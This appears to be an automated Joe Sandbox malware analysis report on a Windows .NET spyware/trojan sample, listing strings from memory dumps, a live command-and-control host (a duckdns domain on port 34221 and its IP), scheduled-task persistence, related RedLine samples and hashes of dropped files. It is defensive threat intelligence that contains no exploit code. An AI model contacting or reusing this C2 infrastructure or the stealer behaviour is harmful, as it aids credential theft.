                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://billred229102.duckdns.org:34221RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.ipify.orgcookies//settinString.Removeg13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://billred229102.duckdns.org:34221t-RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://tempuri.org/0RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name13P2mxLaQk.exe, 00000000.00000002.1460091932.000000000303C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, VWGccZGgix.exe, 00000009.00000002.1500999743.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://billred229102.duckdns.orgRegSvcs.exe, 00000007.00000002.1603595043.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      45.88.88.45
                                                                      		billred229102.duckdns.orgBulgaria
                                                                      		10753LVLT-10753UStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1527904
                                                                      Start date and time:2024-10-07 11:28:17 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 47s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:13P2mxLaQk.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:B47604CCFF9C611EAF0AA3D7443827B7.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/100@2/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 135
                                                                      • Number of non-executed functions: 7
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: 13P2mxLaQk.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      05:29:14API Interceptor1x Sleep call for process: 13P2mxLaQk.exe modified
                                                                      05:29:16API Interceptor19x Sleep call for process: powershell.exe modified
                                                                      05:29:17API Interceptor1x Sleep call for process: VWGccZGgix.exe modified
                                                                      05:29:24API Interceptor87x Sleep call for process: RegSvcs.exe modified
                                                                      11:29:16Task SchedulerRun new task: VWGccZGgix path: C:\Users\user\AppData\Roaming\VWGccZGgix.exe

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      billred229102.duckdns.orgPayment slip.exeGet hashmaliciousRedLineBrowse
                                                                      • 37.48.118.12
                                                                      Payment slip.exeGet hashmaliciousRedLineBrowse
                                                                      • 37.48.118.12

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      LVLT-10753USSOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                      • 45.88.91.147
                                                                      kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                      • 178.215.236.225
                                                                      yakov.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 168.215.26.13
                                                                      Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119
                                                                      s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 178.215.236.119

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\13P2mxLaQk.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2666
                                                                      Entropy (8bit):5.345804351520589
                                                                      Encrypted:false
                                                                      SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpH8HKx1qHxLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5JcE
                                                                      MD5:7ADCF08EB89A57934E566936815936CF
                                                                      SHA1:C164331AA17656919323F4464BC1FC1EB1B8CA90
                                                                      SHA-256:848A610C0FC09EF83A3DFC86A453C9B6F81DAA2A89779529254577F818E68933
                                                                      SHA-512:54EB0F3313760BC4C88C736C5CE57B1890BBCD00376445B3BFC3BB17C6ACBCE22700491D96B6E7E926892555B2AC0C62F0C31557F0E00C00EA38D225228212D3
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VWGccZGgix.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379071839957789
                                                                      Encrypted:false
                                                                      SSDEEP:48:bWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:bLHxvIIwLgZ2KRHWLOugss
                                                                      MD5:C3F9F475D953A9DC179502BE9BDECF03
                                                                      SHA1:A18CD4620483891E0A09A31F9A3B026B6F7462AB
                                                                      SHA-256:E088F0002182EA78456B394018C08C88B0FC73D5A4AB9DE3FE4E18DFB02C8F3A
                                                                      SHA-512:FE4F3C44B628418A78B1C6808DFB2FCC5042E64CBD06A6C5D8602F4755905B4D593C95A797C82080A6D775E525C983D2004C106B8E211E3FCBB5A04189AD582B
                                                                      Malicious:false
                                                                      Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15ybh1zc.2ay.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31yyrxo2.jps.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erocvk3p.exb.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmjaztvh.zjg.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\tmp1357.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
